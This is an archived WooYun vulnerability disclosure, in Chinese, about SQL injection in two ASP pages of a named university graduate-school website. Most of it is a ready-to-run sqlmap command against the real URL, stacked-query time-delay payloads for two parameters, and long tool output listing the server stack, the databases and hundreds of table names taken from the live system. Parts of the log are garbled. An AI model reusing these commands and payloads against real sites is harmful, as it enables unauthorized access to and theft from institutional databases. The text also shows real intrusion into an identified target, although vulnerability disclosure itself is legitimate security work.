乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-15: 细节已通知厂商并且等待厂商处理中 2015-05-20: 厂商已经主动忽略漏洞,细节向公众公开
随便逛逛,发现了这个小洞
python 1.sqlmap.py -u "http://yjsb.gmc.edu.cn/bmzz/index.asp?bmid=13&bmmc=%E5%AD%A6%E4%BD%8D%E5%8A%9E%E5%85%AC%E5%AE%A4" -p bmid
GET parameter 'bmid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 86 HTTP(s) requests:---Parameter: bmid (GET) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: bmid=13;WAITFOR DELAY '0:0:5'--&bmmc=%E5%AD%A6%E4%BD%8D%E5%8A%9E%E5%85%AC%E5%AE%A4---[17:07:42] [INFO] testing Microsoft SQL Server[17:07:42] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n][17:07:49] [INFO] confirming Microsoft SQL Server[17:07:55] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[17:07:55] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 1 times[17:07:55] [INFO] fetched data logged to text files under 'C:\Users\wjl\.sqlmap\output\yjsb.gmc.edu.cn'
哈哈,堆查询再来一个:2.http://yjsb.gmc.edu.cn/yzxx/yjxx.asp?ID=153
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 85 HTTP(s) requests:---Parameter: ID (GET) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: ID=153;WAITFOR DELAY '0:0:5'-- Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'-----[17:33:35] [INFO] testing Microsoft SQL Server
数据库:available databases [7]:[*] gedu[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb跑表太慢咯!!!
[23:38:34] [INFO] fetching database names[23:38:34] [INFO] fetching number of databases[23:38:34] [INFO] resumed: 7[23:38:34] [INFO] resumed: gedu[23:38:34] [INFO] resumed: master[23:38:34] [INFO] resumed: model[23:38:34] [INFO] resumed: msdb[23:38:34] [INFO] resumed: Northwind[23:38:34] [INFO] resumed: pubs[23:38:34] [INFO] resumed: tempdb[23:38:34] [INFO] fetching tables for databases: Northwind, gedu, master, model, msdb, pubs, tempdb[23:38:34] [INFO] fetching number of tables for database 'tempdb'[23:38:34] [INFO] resumed: 2[23:38:34] [INFO] resumed: dbo.sysconstraints[23:38:34] [INFO] resumed: dbo.syssegments[23:38:34] [INFO] fetching number of tables for database 'gedu'[23:38:34] [INFO] resumed: 281[23:38:34] [INFO] resumed: dbo.aaaa[23:38:34] [INFO] resumed: dbo.address[23:38:34] [INFO] resumed: dbo.b03jbk[23:38:34] [INFO] resumed: dbo.b04jbk[23:38:34] [INFO] resumed: dbo.b04md[23:38:34] [INFO] resumed: dbo.BDK[23:38:34] [INFO] resumed: dbo.bmgly[23:38:34] [INFO] resumed: dbo.bmqxb[23:38:34] [INFO] resumed: dbo.bscjkA[23:38:34] [INFO] resumed: dbo.bsk[23:38:34] [INFO] resumed: dbo.CJSHK[23:38:34] [INFO] resumed: dbo.count[23:38:34] [INFO] resumed: dbo.count_bak[23:38:34] [INFO] resumed: dbo.czqxb[23:38:34] [INFO] resumed: dbo.czyb[23:38:34] [INFO] resumed: dbo.DBDMK[23:38:34] [INFO] resumed: dbo.DSJSJBXX[23:38:34] [INFO] resumed: dbo.dsjsjbxx_inform[23:38:34] [INFO] resumed: dbo.DSJSMM![23:38:34] [INFO] resumed: dbo.dtproperties[23:38:34] [INFO] resumed: dbo.dwmc_jjk[23:38:34] [INFO] resumed: dbo.dWMCK[23:38:34] [INFO] resumed: dbo.DWXWLBKA[23:38:34] [INFO] resumed: dbo.f_servwed[23:38:34] [INFO] resumed: dbo.FACCDM[23:38:34] [INFO] resumed: dbo.friend[23:38:34] [INFO] resumed: dbo.GLY[23:38:34] [INFO] resumed: dbo.GLYK[23:38:34] [INFO] resumed: dbo.GRPYJHZK[23:38:34] [INFO] resumed: dbo.grpyjhzk_bak[23:38:34] [INFO] resumed: dbo.grpyjhzk_bg[23:38:34] [INFO] resumed: dbo.grpyjhzk_bg_bak[23:38:34] [INFO] resumed: dbo.grpyjhzk_nd[23:38:34] [INFO] resumed: dbo.grpyjhzk_nd_bak[23:38:34] [INFO] resumed: dbo.GRPYJHZK_sav[23:38:34] [INFO] resumed: dbo.GRPYJHZK_temp[23:38:34] [INFO] resumed: dbo.gxdm[23:38:34] [INFO] resumed: dbo.hyxxk[23:38:34] [INFO] resumed: dbo.jckcdyb[23:38:34] [INFO] resumed: dbo.JFK[23:38:34] [INFO] resumed: dbo.jgy02jbk[23:38:34] [INFO] resumed: dbo.jwyk[23:38:34] [INFO] resumed: dbo.JXPJB[23:38:34] [INFO] resumed: dbo.JXPJJCa\x13!\x06!\t\x0b\x03I\x03[23:38:34] [INFO] resumed: dbo.JXPJXNB[23:38:34] [INFO] resumed: dbo.JXSJBXX[23:38:34] [INFO] resumed: dbo.KCCCDMK[23:38:34] [INFO] resumed: dbo.kqjxdgxsb[23:38:34] [INFO] resumed: dbo.NEXTXQKCKH\t[23:38:34] [INFO] resumed: dbo.nong03[23:38:34] [INFO] resumed: dbo.pbcatcolQ[23:38:34] [INFO] resumed: dbo.pbcatedt[23:38:34] [INFO] resumed: dbo.pbcatfmt[23:38:34] [INFO] resumed: dbo.pbcattbl[23:38:34] [INFO] resumed: dbo.pbcatvld[23:38:34] [INFO] resumed: dbo.preXQKCJH[23:38:34] [INFO] resumed: dbo.PreYJSXKK[23:38:34] [INFO] resumed: dbo.PYJHZK[23:38:34] [INFO] resumed: dbo.PYJHZK_JXB[23:38:34] [INFO] resumed: dbo.PYJHZK_NEW[23:38:34] [INFO] resumed: dbo.pyjhzk_yjfx[23:38:34] [INFO] resumed: dbo.reg[23:38:34] [INFO] resumed: dbo.sykck[23:38:34] [INFO] resumed: dbo.sysconstraints[23:38:34] [INFO] resumed: dbo.syssegmints[23:38:34] [INFO] resumed: dbo.t_jiaozhu[23:38:34] [INFO] resumed: dbo.T_ZY_TeacherInfo[23:38:34] [INFO] resumed: dbo.tb_bboodel[23:38:34] [INFO] resumed: dbo.tb_bm_onff[23:38:34] [INFO] resumed: dbo.tb_bmd[23:38:34] [INFO] resumed: dbo.tb_bysk[23:38:34] [INFO] resumed: dbo.tb_dept[23:38:34] [INFO] resumed: dbo.tb_form_dlk[23:38:34] [INFO] resumed: dbo.tb_form_dlxl[23:38:34] [INFO] resumed: dbo.tb_fsx[23:38:34] [INFO] resumed: dbo.tb_fsx2[23:38:34] [INFO] resumed: dbo.tb_fxstzhk[23:38:34] [INFO] resumed: dbo.tb_frpyjh_rec[23:38:34] [INFO] resumed: dbo.tb_gxzydm[23:38:34] [INFO] resumed: dbo.tb_gxzydm_bk[23:38:34] [INFO] resumed: dbo.tb_his_goods_show[23:38:34] [INFO] resumed: dbo.tb_hxtjk[23:38:34] [INFO] resumed: dbo.tb_jyss_inform[23:38:34] [INFO] resumed: dbo.tb_kebiao_bz[23:38:34] [INFO] resumed: dbo.tb_kebiao_model[23:38:34] [INFO] resumed: dbo.tb_kskmk[23:38:34] [INFO] resumed: dbo.tb_kssjk[23:38:34] [INFO] resumed: dbo.tb_lqka[23:38:34] [INFO] resumed: dbo.tb_nlq[23:38:34] [INFO] resumed: dbo.tb_nlq_temp[23:38:34] [INFO] resumed: dbo.tb_paike_temp[23:38:34] [INFO] resumed: dbo.tb_skdddm[23:38:34] [INFO] resumed: dbo.tb_sksjdm[23:38:34] [INFO] resumed: dbo.tb_staff_info[23:38:34] [INFO] resumed: dbo.tb_systb[23:38:34] [INFO] resumed: dbo.tb_systb_copy[23:38:34] [INFO] resumed: dbo.tb_systb_resouce[23:38:34] [INFO] resumed: dbo.tb_unjssksj[23:38:34] [INFO] resumed: dbo.tb_winbill[23:38:34] [INFO] resumed: dbo.tb_yjfxk[23:38:34] [INFO] resumed: dbo.tb_zy[23:38:34] [INFO] resumed: dbo.tb_zyxsk[23:38:34] [INFO] resumed: dbo.tbs_area[23:38:34] [INFO] resumed: dbo.tbs_bill_item_class[23:38:34] [INFO] resumed: dbo.tbs_bilb[23:38:34] [INFO] resumed: dbo.tbs_cfmc[23:38:34] [INFO] resumed: dbo.tbs_cfmnese_mark[23:38:34] [INFO] resumed: dbo.tbs_chinese_w[23:38:34] [INFO] resumed: dbo.tbs_cjdj[23:38:34] [INFO] resumed: dbo.tbs_cjljz[23:38:34] [INFO] resumed: dbo.tbs_cjlx[23:38:34] [INFO] resumed: dbo.tbs_cjsjz[23:38:34] [INFO] resumed: dbo.tbs_country[23:38:34] [INFO] resumed: dbo.tbs_fpdwlb[23:38:34] [INFO] resumed: dbo.tbs_gatq[23:38:34] [INFO] resumed: dbo.tbs_gxdm[23:38:34] [INFO] resumed: dbo.tbs_gxdm_old[23:38:34] [INFO] resumed: dbo.tbs_jfdm[23:38:34] [INFO] resumed: dbo.tbs_jkzk[23:38:34] [INFO] resumed: dbo.tbs_jljb[23:38:34] [INFO] resumed: dbo.tbs_kkcc[23:38:34] [INFO] resumed: dbo.tbs_ksfs[23:38:34] [INFO] resumed: dbo.tbs_ksfs_zs[23:38:34] [INFO] resumed: dbo.tbs_marital_status[23:38:34] [INFO] resumed: dbo.tbs_mj[23:38:34] [INFO] resumed: dbo.tbs_nation[23:38:34] [INFO] resumed: dbo.tbs_nj[23:38:34] [INFO] resumed: dbo.tbs_pyfs[23:38:34] [INFO] resumed: dbo.tbs_relationship[23:38:34] [INFO] resumed: dbo.tbs_rkjs[23:38:34] [INFO] resumed: dbo.tbs_ssdok[23:38:34] [INFO] resumed: dbo.tbs_ssjl[23:38:34] [INFO] resumed: dbo.tbs_tech_title[23:38:34] [INFO] resumed: dbo.tbs_xj_status[23:38:34] [INFO] resumed: dbo.tbs_xjyd[23:38:34] [INFO] resumed: dbo.tbs_xk_1[23:38:34] [INFO] resumed: dbo.tbs_xklb[23:38:34] [INFO] resumed: dbo.tbs_xl[23:38:34] [INFO] resumed: dbo.tbs_xmlx[23:38:34] [INFO] resumed: dbo.tbs_xmly[23:38:34] [INFO] resumed: dbo.tbs_xq[23:38:34] [INFO] resumed: dbo.tbs_xq_year[23:38:34] [INFO] resumed: dbo.tbs_xq_year_nj[23:38:34] [WARNING] time-based comparison requires larger statistical model, please wait..............................do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n]d[23:39:10] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsb[23:39:21] [INFO] adjusting time delay to 1 second due to good response timeso.tbs_xqxk_onff[23:40:15] [INFO] retrieved: dbo.tbs_xqxk_onff_b[23:40:48] [INFO] retrieved: dbo.tbs_xshjlb[23:41:30] [INFO] retrieved: dbo.tbs_xslb[23:41:55] [INFO] retrieved: dbo.tbs_xsly[23:42:16] [INFO] retrieved: dbo.tbs_xsresource[23:43:13] [INFO] retrieved: dbo.tbs_xtyhb[23:43:48] [INFO] retrieved: dbo.tbs_xuewei[23:44:28] [INFO] retrieved: dbo.tbs_xuezhi[23:45:01] [INFO] retrieved: dbo.tbs_xwdwdm[23:45:43] [INFO] retrieved: dbo.tbs_xwdwdm_old[23:46:27] [INFO] retrieved: dbo.tbs_xx[23:46:47] [INFO] retrieved: dbo.tbs_xxbxlx[23:47:27] [INFO] retrieved: dbo.tbs_xxdm[23:47:51] [INFO] retrieved: dbo.tbs_xxdm_c[23:48:19] [INFO] retrieved: dbo.tbs_xxfs[23:48:43] [INFO] retrieved: dbo.tbs_xxjbz[23:49:13] [INFO] retrieved: dbo.tbs_xxxz[23:49:41] [INFO] retrieved: dbo.tbs_zhiye[23:50:20] [INFO] retrieved: dbo.tbs_zjlx[23:50:52] [INFO] retrieved: dbo.tbs_zycc[23:51:20] [INFO] retrieved: dbo.tdxl[23:51:51] [ERROR] invalid character detected. retrying..[23:51:51] [WARNING] increasing time delay to 2 secondsbs[23:52:09] [INFO] retrieved: dbo.tdxlss[23:52:48] [INFO] retrieved: dbo.temp_cjk[23:54:10] [INFO] retrieved: dbo.view_jwyxqcjcx[23:56:40] [INFO] retrieved: dbo.view_jwyxqcjcx1[23:57:27] [INFO] retrieved: dbo.XBMK[23:58:10] [INFO] retrieved: dbo.xqkc_wt[23:59:42] [ERROR] invalid character detected. retrying..[23:59:42] [WARNING] increasing time delay to 3 secondsjc
点到为止
过滤~~
危害等级:无影响厂商忽略
忽略时间:2015-05-20 11:46
暂无